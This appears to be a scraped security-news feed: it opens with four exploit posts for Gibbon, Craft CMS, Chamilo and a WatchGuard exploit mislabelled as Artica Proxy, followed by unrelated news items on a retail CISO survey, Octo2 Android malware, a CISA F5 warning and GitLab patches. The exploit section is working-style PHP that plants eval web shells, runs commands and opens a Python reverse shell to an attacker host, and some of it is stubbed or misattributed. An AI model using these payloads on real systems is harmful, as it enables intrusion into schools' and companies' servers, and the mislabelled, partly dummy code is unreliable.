Gibbon School Platform version 26.0.00 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gibbon School Platform 26.0.00 Code Injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://gibbonedu.org/                                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 108 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GibbonExploit{    private $target_uri;    private $username;    private $password;    private $webshell_name;    public function __construct($target_uri, $username, $password, $webshell_name = null)    {        $this->target_uri = $target_uri;        $this->username = $username;        $this->password = $password;        $this->webshell_name = $webshell_name ?: $this->randomString() . '.php';    }    private function send_request($method, $url, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function gibbon_login()    {        $login_url = $this->target_uri . '/login.php?timeout=true';        $data = [            'address' => '',            'method' => 'default',            'username' => $this->username,            'password' => $this->password,            'gibbonSchoolYearID' => '025',            'gibboni18nID' => '0002'        ];        return $this->send_request('POST', $login_url, http_build_query($data));    }    private function construct_form_data($payload)    {        $payload_len = strlen($payload);        $payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}';        $form_data = [            'address' => '/modules/System Admin/import_run.php',            'mode' => 'sync',            'syncField' => 'N',            'syncColumn' => '',            'columnOrder' => $payload_data,            'columnText' => 'N;',            'fieldDelimiter' => '%2C',            'stringEnclosure' => '%22',            'filename' => $this->randomString() . '.xlsx',            'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',            'ignoreErrors' => '1',            'Failed' => 'Submit'        ];        return $form_data;    }    public function upload_webshell($b64_payload)    {        $php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name;        $form_data = $this->construct_form_data($php_payload);        $url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';        return $this->send_request('POST', $url, http_build_query($form_data));    }    public function execute_php($cmd)    {        $b64_payload = base64_encode($cmd);        $res = $this->upload_webshell($b64_payload);        if (!$res) {            die('Web shell upload error.');        }        // execute the webshell        $url = $this->target_uri . '/' . $this->webshell_name;        return $this->send_request('GET', $url);    }    private function randomString($length = 10)    {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new GibbonExploit('https://target-site.com', 'username@example.com', 'password');$exploit->gibbon_login();$response = $exploit->execute_php('phpinfo();');echo $response;Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gibbon School Platform 26.0.00 Code Injection

Craft CMS version 4.4.14 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Craft CMS 4.4.14 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://craftcms.com/                                                                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 116 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass CraftCMSExploit {    private $target_uri;    private $webshell;    private $config = ['upload_tmp_dir' => null, 'document_root' => null];    private $post_param;    private $get_param;    public function __construct($target_uri, $webshell = '') {        $this->target_uri = $target_uri;        $this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';        $this->post_param = $this->generateRandomString(1, 8);        $this->get_param = $this->generateRandomString(1, 8);    }    public function check_phpinfo() {        // Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()        $data = http_build_query([            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'        ]);        $response = $this->sendPostRequest($this->target_uri, $data);        if ($response) {            $this->parsePHPInfo($response);        }    }    private function parsePHPInfo($response) {        // Parses the phpinfo() HTML response to find upload_tmp_dir and document_root        if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);        }        if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['document_root'] = trim($matches[1]);        }    }    public function upload_webshell() {        // Generates an XML payload to upload the webshell via Imagick MSL        $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>        <image>            <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />            <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />        </image>";        $form_data = [            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',            'payload' => $payload        ];        $response = $this->sendMultipartPostRequest($this->target_uri, $form_data);        return strpos($response, '502') !== false;    }    public function execute_command($cmd) {        // Executes a command on the server via the uploaded webshell        $payload = base64_encode($cmd);        $data = http_build_query([$this->post_param => $payload]);        return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);    }    private function sendPostRequest($uri, $data) {        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => $data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function sendMultipartPostRequest($uri, $data) {        // Sends a multipart form-data POST request        $boundary = uniqid();        $delimiter = '------' . $boundary;        $post_data = $this->buildMultipartData($data, $delimiter);        $options = [            'http' => [                'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",                'method' => 'POST',                'content' => $post_data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function buildMultipartData($data, $delimiter) {        $post_data = '';        foreach ($data as $name => $content) {            $post_data .= "--$delimiter\r\n";            $post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";            $post_data .= "$content\r\n";        }        $post_data .= "--$delimiter--\r\n";        return $post_data;    }    private function generateRandomString($min, $max) {        $length = rand($min, $max);        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new CraftCMSExploit('http://target-craftcms.com');$exploit->check_phpinfo();if ($exploit->upload_webshell()) {    echo $exploit->execute_command('whoami');}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Craft CMS 4.4.14 Code Injection

Chamilo version 1.11.18 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Chamilo 1.11.18 Code Injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 123 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass ChamiloExploit {    private $targetUri;    private $webshellName;    private $postParam;    public function __construct($targetUri, $webshell = null) {        $this->targetUri = rtrim($targetUri, '/');        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(8)) . '.php';    }    private function soapRequest($cmd) {        $pptSize = rand(720, 1440) . 'x' . rand(360, 720);        return <<<EOS<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"    xmlns:ns1="{$this->targetUri}"    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"    xmlns:xsd="http://www.w3.org/2001/XMLSchema"    xmlns:ns2="http://xml.apache.org/xml-soap"    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">    <SOAP-ENV:Body>        <ns1:wsConvertPpt>            <param0 xsi:type="ns2:Map">                <item>                    <key xsi:type="xsd:string">file_data</key>                    <value xsi:type="xsd:string"></value>                </item>                <item>                    <key xsi:type="xsd:string">file_name</key>                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>                </item>                <item>                    <key xsi:type="xsd:string">service_ppt2lp_size</key>                    <value xsi:type="xsd:string">{$pptSize}</value>                </item>            </param0>        </ns1:wsConvertPpt>    </SOAP-ENV:Body></SOAP-ENV:Envelope>EOS;    }    public function uploadWebshell() {        $this->postParam = bin2hex(random_bytes(4));        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);        if ($pngWebshell === null) {            return null;        }        $payload = base64_encode($pngWebshell);        $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    private function injectPhpPayloadPng($phpPayload) {        // Implement your logic to inject PHP payload into a PNG image        // For demonstration purposes, we'll return a dummy PNG data        return pack('H*', '89504E470D0A1A0A...'); // Example PNG header    }    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);        return $response;    }    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -a -d|sh";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    public function check() {        $marker = bin2hex(random_bytes(4));        $res = $this->executeCommand("echo {$marker}");        if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit($payload) {        switch ($payload['type']) {            case 'php':                $res = $this->uploadWebshell();                if (!$res || strpos($res, 'wsConvertPptResponse') === false) {                    throw new Exception('Web shell upload error.');                }                $this->executePhp($payload['encoded']);                break;            case 'unix_cmd':                $this->executeCommand($payload['encoded']);                break;            case 'linux_dropper':                // Implement Linux dropper logic                break;        }    }    private function sendRequest($method, $uri, $ctype, $data) {        // Implement your HTTP request logic here (using cURL or similar)        // For demonstration purposes, return a dummy response        return 'Dummy response';    }}// Usage$exploit = new ChamiloExploit('http://target.com', 'webshell.php');$exploit->check();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Chamilo 1.11.18 Code Injection

Artica Proxy version 4.40 suffers from a code injection vulnerability that provides a reverse shell.

    =============================================================================================================================================| # Title     : Artica Proxy appliance 4.40 Code Injection Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://artica-proxy.com/                                                                                                   |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 97 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass WatchGuardExploit {    private $targetUri;    private $lhost;    private $lport;    private $shell;    public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") {        $this->targetUri = $targetUri;        $this->lhost = $lhost;        $this->lport = $lport;        $this->shell = $shell;    }    public function sendRequest($method, $url, $data = null, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function checkWatchGuardFirebox() {        $url = $this->targetUri . '/auth/login';        $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']);                if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false             && strpos($response, 'Firebox') !== false) {            return true;        }        return false;    }    public function createBofPayload() {        // Generate the buffer overflow payload with Python reverse shell code        $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric        $pyFilename = "/tmp/" . $randomStr . ".py";        $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>";        $payload .= str_repeat('<BBBBMFA>', 3680);        // Include a Python reverse shell command as the payload        $payload .= 'import socket;from subprocess import call; from os import dup2;';        $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);';        $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));';        $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);';        $payload .= 'call(["' . $this->shell . '","-i"]);';        $payload .= 'import os; os.remove("' . $pyFilename . '");';        return gzencode($payload); // gzip encoding    }    public function exploit() {        if (!$this->checkWatchGuardFirebox()) {            echo "Target is not vulnerable.\n";            return;        }        echo "Target is vulnerable. Sending exploit...\n";        $bofPayload = $this->createBofPayload();        // Send the buffer overflow payload        $url = $this->targetUri . '/agent/login';        $this->sendRequest('POST', $url, $bofPayload, [            'Accept-Encoding: gzip, deflate',            'Content-Encoding: gzip'        ]);        echo "Payload sent.\n";    }}// Example usage:$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Artica Proxy 4.40 Code Injection

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'MODEM' HTTP POST parameter called by the dialupSwitch.php script.

ABB Cylon Aspect 3.08.00 (dialupSwitch.php) Remote Code Execution

CISOs in consumer and retail organizations appear to accept greater risks to allow for more innovation, which could be a model for future growth.

Source: FOTOGRIN via Shutterstock

Chief information security officers (CISOs) have long borne the reputation of blocking innovation to keep their organization and all its data safe and sound.

However, those competing priorities appear to be shifting, especially in the retail and consumer sectors. While the majority of CISOs (59%) across all sectors see themselves as "enablers" — as opposed to just managers of cyber-risk — nearly all (97%) CISOs in the retail segment view their role as an enabler, according to a survey of more than 1,000 global CISOs conducted by cybersecurity firm Netskope. As a result, CISOs' acceptance of risk has grown, with the majority of all CISOs ready to take on more risk compared with five years ago. For the retail sector, the share of risk-embracing CISOs is even higher (74%).

The pressure on companies to innovate — and CISOs' understanding of their role in making that happen — are driving CISOs to become risk-takers, Netskope CISO James Robinson says.

"Typically, you had someone who was really, really technical, and they were working through things, but they really didn't have that business side of the brain — knowing the business metrics and data," he says. "CISOs have moved from the need to say no and maybe even taken it a step further — saying the answer is always, "Yes, just how do we get there?'"

From gift-card scams to brand hijacking for phishing attacks to devastating ransomware, retailers are a popular target for cybercriminals and fraudsters. At the same time, the retail sector has had to weather the chaos caused by the pandemic and supply-chain disruptions, which led to demand fluctuations and a loss of brand loyalty. The subsequent spike in inflation over the past two years left many consumers prioritizing price. Most retail executives (67%) expect consumers to purchase fewer products in 2024, and so retailers are increasingly focused on winning loyalty, according to consultancy Deloitte's "2024 US Retail Industry Outlook" report.

**Security in the Era of Amazon and AI**

With all those disruptive forces in the market, retailers have had to transform themselves to compete, morphing from just focused on selling products to becoming data companies. Consequently, CISOs at retail companies can no longer afford to focus solely on putting a wall around their information, says Netskope's Robinson.

Like other members of the C-suite, CISOs have to be thinking about the business more holistically, Robinson says.

"Retailers now have to ask, 'What's the next innovation? What's the next thing we have to do?'" he says. "And all of those decisions are data driven ... they're being led by this wealth of data that they're collecting, so that they can have targeted experiences for their customers."

Artificial intelligence is one obvious way to innovate. A great deal of the pressure to change over the past two years has come from the development of AI capabilities and businesses' fear of missing out on any innovations — and competitive advantages. In-store cameras paired with AI analysis can determine consumer interest in products, ecommerce platforms can better predict inventory, and stores can even use recognition of facial expressions to gauge consumer sentiment.

While most companies have slowly tested the waters of AI, many will be putting their first AI-powered applications into product in the next 12 months, Robinson says.

"This is the first year also that we're really seeing GenAI projects kick off, and in the next year, we'll start to really see kind of the value of some of these projects," he says. "So I think that's probably what's shaping it even more."

**The Business-Focused CISO**

Yet, AI and cybersecurity are two technology areas that are least likely to have positive returns on investments for retailers, according to consultancy KPMG's 2023 "US Consumer and Retail Sector Insights Report." Only 46% of survey respondents noted an increase in profitability or performance due to AI — and 45% from cybersecurity. But the consumer and retail sector fell even short of that threshold, with 38% and 37% of respondents, respectively, in those industries seeing a return on investment from AI or cybersecurity.

"For many consumer and retail organizations, getting data right is still a work in progress," KPMG stated in the report.

Understandably, there are still some risks where CISOs are unwilling to compromise. Sharing information with outside parties or third parties without the proper review and without the proper agreement in place — a threat becoming more common in the era of AI — is just not possible, says Robinson.

"We knew how to data warehouse, and it's got business value — even more now with the development of GenAI," he says. "I think all of those things have kind of started to come together at this point, allowing the retail CISO to really have a leg to stand on. Now they just also have kind of the business knowledge, because they're being brought into more of these conversations at this point."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Retail CISOs Take on More Risk to Foster Innovation

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This…

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This advanced trojan uses sophisticated techniques to evade detection, steal credentials, and enable remote access to infected devices.

Cybersecurity researchers at DomainTools have released their new research on Octo2, a new version of the notorious Octo malware family. Octo2 targets Android mobile devices and based on its activity, researchers believe that it will target users globally soon.

According to Steve Behm, Solutions Engineer at DomainTools, Octo2 represents a major change in cybersecurity threats. This updated version of the prolific Octo (ExobotCompact) family spreads rapidly due to its enhanced features, global adoption of its predecessor, and aggressive distribution tactics. 

Octo2 features improved remote access trojan capabilities, ensuring reliable communication and control over infected devices even in challenging network conditions. Moreover, its enhanced Anti-Analysis and Anti-Detection techniques can hinder security analysis and detection, making it more difficult to identify and neutralize the threat.

In addition, the use of DGA-Based C2 server generation algorithm (DGA) to create dynamic command and control (C2) server addresses adds a layer of complexity, making it harder for security systems to track and disrupt communication.

“We were eventually able to expand the original 9 domains and 7 TLDs to 269 domains and 12 TLDs first seen from August 22nd, 2024 to October 4th, 2024,” reads DomainTool’s **blog post** shared with Hackread.com ahead of publishing on October 10, 2024.

****Currently Targeting Europe****

Early samples of Octo2 have been observed in several European countries, including Italy, Poland, Moldova, and Hungary. However, given the global reach of the original Octo and the improvements in Octo2, its distribution is expected to expand rapidly. 

****Attack Pattern** – Disguised as VPN and Browser**

The malware often disguises itself as legitimate applications, such as Google Chrome, NordVPN, or “Enterprise Europe Network,” to deceive unsuspecting users. It employs a dropper called **Zombinder** to deliver the malicious payload, prompting users to install a seemingly harmless plugin that is actually Octo2.   

For your information, Zombinder is another Android malware that was actively sold on the dark web in 2022. Its developers also offered a Windows version. At that time, Zombinder was found distributing the notorious **Xenomorph banking malware**, disguised as the VidMate app.

Once a device gets infected, Octo2 allows remote access to mobile devices, intercepting push notifications, harvesting credentials, and performing unauthorized actions, such as allowing for unauthorized login and access. The **Conficker worm discovered in 2008** is one of the earliest examples of a DGA used by malware families and so far 50 malware families, including Zeus and Dyre, have been identified to be using DGA domains.

****Abusing Domain Generation Algorithms****

Octo2’s use of a DGA (Domain Generation Algorithms – Different from **Registered Domain Generation Algorithms – RDGAs**) to generate its C2 server address is a significant enhancement. This technique allows the malware to constantly change its communication endpoints, making it more resilient to takedowns and detection efforts. While researchers can identify the patterns used to generate these domains, the dynamic nature of the C2 infrastructure presents a massive threat.  

Domain Tools researchers warn users to be cautious of Octo2 malware and avoid downloading apps or software from third-party sites. For businesses, using **threat intelligence** is important. This includes advanced detection tools like sandboxing, monitoring DNS traffic for unusual activity, and using endpoint security solutions to spot malicious behaviour on infected devices. Regular DNS traffic monitoring can also help detect DGA-based malware.

1.  **Android Malware Ajina.Banker Steals 2FA Codesvia Telegram**
2.  **BingoMod Android Malware Posing as Security Apps, Wipes Data**
3.  **SMS Stealer Targeting Android Users via Malicious Apps and Ads**
4.  **Phishing Attacks Target European Bank Users on iOS and Android**
5.  **Telegram Android Vulnerability “EvilVideo” Sends Malware as Videos**

Octo2 Malware Uses Fake NordVPN, Chrome Apps to Infect Android Devices

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that it has observed threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to conduct reconnaissance of target networks.
It said the module is being used to enumerate other non-internet-facing devices on the network. The agency, however, did not disclose who

Vulnerability / Network Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that it has observed threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to conduct reconnaissance of target networks.

It said the module is being used to enumerate other non-internet-facing devices on the network. The agency, however, did not disclose who is behind the activity, or what the end goals of the campaign are.

"A malicious cyber actor could leverage the information gathered from unencrypted persistence cookies to infer or identify additional network resources and potentially exploit vulnerabilities found in other devices present on the network," CISA said in an advisory.

It has also recommended organizations encrypt persistent cookies employed in F5 BIG-IP devices by configuring cookie encryption within the HTTP profile. Furthermore, it's urging users to verify the protection of their systems by running a diagnostic utility provided by F5 called BIG-IP iHealth to identify potential issues.

"The BIG-IP iHealth Diagnostics component of the BIG-IP iHealth system evaluates the logs, command output, and configuration of your BIG-IP system against a database of known issues, common mistakes, and published F5 best practices," F5 notes in a support document.

"The prioritized results provide tailored feedback about configuration issues or code defects and provide a description of the issue, \[and\] recommendations for resolution."

The disclosure comes as cybersecurity agencies from the U.K. and the U.S. have published a joint bulletin detailing Russian state-sponsored actors' attempts to target diplomatic, defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations.

The activity has been attributed to a threat actor tracked as APT29, which is also known as BlueBravo, Cloaked Ursa, Cozy Bear, and Midnight Blizzard. APT29 is understood to be a key cog in the Russian military intelligence machine and is affiliated with the Foreign Intelligence Service (SVR).

"SVR cyber intrusions include a heavy focus on remaining anonymous and undetected. The actors use TOR extensively throughout intrusions – from initial targeting to data collection – and across network infrastructure," the agencies said.

"The actors lease operational infrastructure using a variety of fake identities and low reputation email accounts. The SVR obtains infrastructure from resellers of major hosting providers."

Attacks mounted by APT29 have been categorized as those designed to harvest intelligence and establish persistent access so as to facilitate supply chain compromises (i.e., targets of intent), as well as those that allow them to host malicious infrastructure or conduct follow-on operations from compromised accounts by taking advantage of publicly known flaws, weak credentials, or other misconfigurations (i.e., targets of opportunity).

Some of the significant security vulnerabilities highlighted include CVE-2022-27924, a command injection flaw in Zimbra Collaboration, and CVE-2023-42793, a critical authentication bypass bug that allows for remote code execution on TeamCity Server.

APT29 is a relevant example of threat actors continuously innovating their tactics, techniques and procedures in an attempt to stay stealthy and circumvent defenses, even going to the extent of destroying their infrastructure and erasing any evidence should it suspect their intrusions have been detected, either by the victim or law enforcement.

Another notable technique is the extensive use of proxy networks, comprising mobile telephone providers or residential internet services, to interact with victims located in North America and blend in with legitimate traffic.

"To disrupt this activity, organizations should baseline authorized devices and apply additional scrutiny to systems accessing their network resources that do not adhere to the baseline," the agencies said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of Threat Actors Exploiting F5 BIG-IP Cookies for Network Reconnaissance

GitLab has released security updates for Community Edition (CE) and Enterprise Edition (EE) to address eight security flaws, including a critical bug that could allow running Continuous Integration and Continuous Delivery (CI/CD) pipelines on arbitrary branches.
Tracked as CVE-2024-9164, the vulnerability carries a CVSS score of 9.6 out of 10.

"An issue was discovered in GitLab EE

GitLab has released security updates for Community Edition (CE) and Enterprise Edition (EE) to address eight security flaws, including a critical bug that could allow running Continuous Integration and Continuous Delivery (CI/CD) pipelines on arbitrary branches.

Tracked as CVE-2024-9164, the vulnerability carries a CVSS score of 9.6 out of 10.

"An issue was discovered in GitLab EE affecting all versions starting from 12.5 prior to 17.2.9, starting from 17.3, prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows running pipelines on arbitrary branches," GitLab said in an advisory.

Of the remaining seven issues, four are rated high, two are rated medium, and one is rated low in severity -

*   **CVE-2024-8970** (CVSS score: 8.2), which allows an attacker to trigger a pipeline as another user under certain circumstances
*   **CVE-2024-8977** (CVSS score: 8.2), which allows SSRF attacks in GitLab EE instances with Product Analytics Dashboard configured and enabled
*   **CVE-2024-9631** (CVSS score: 7.5), which causes slowness when viewing diffs of merge requests with conflicts
*   **CVE-2024-6530** (CVSS score: 7.3), which results in HTML injection in OAuth page when authorizing a new application due to a cross-site scripting issue

The advisory is the latest wrinkle of what appears to be a steady stream of pipeline-related vulnerabilities that have been disclosed by GitLab in recent months.

Last month, the company addressed another critical flaw (CVE-2024-6678, CVSS score: 9.9) that could allow an attacker to run pipeline jobs as an arbitrary user.

Prior to that, it also patched three other similar shortcomings – CVE-2023-5009 (CVSS score: 9.6), CVE-2024-5655 (CVSS score: 9.6), and CVE-2024-6385 (CVSS score: 9.6).

While there is no evidence of active exploitation of the vulnerability, users are recommended to update their instances to the latest version to safeguard against potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Critical GitLab Vulnerability Could Allow Arbitrary CI/CD Pipeline Execution

The BMS/BAS controller suffers from a vulnerability that allows an unauthenticated attacker to enable or disable the SSH daemon by sending a POST request to sshUpdate.php with a simple JSON payload. This can be exploited to start the SSH service on the remote host without proper authentication, potentially enabling unauthorized access or stop and deny service access.

Tag

#vulnerability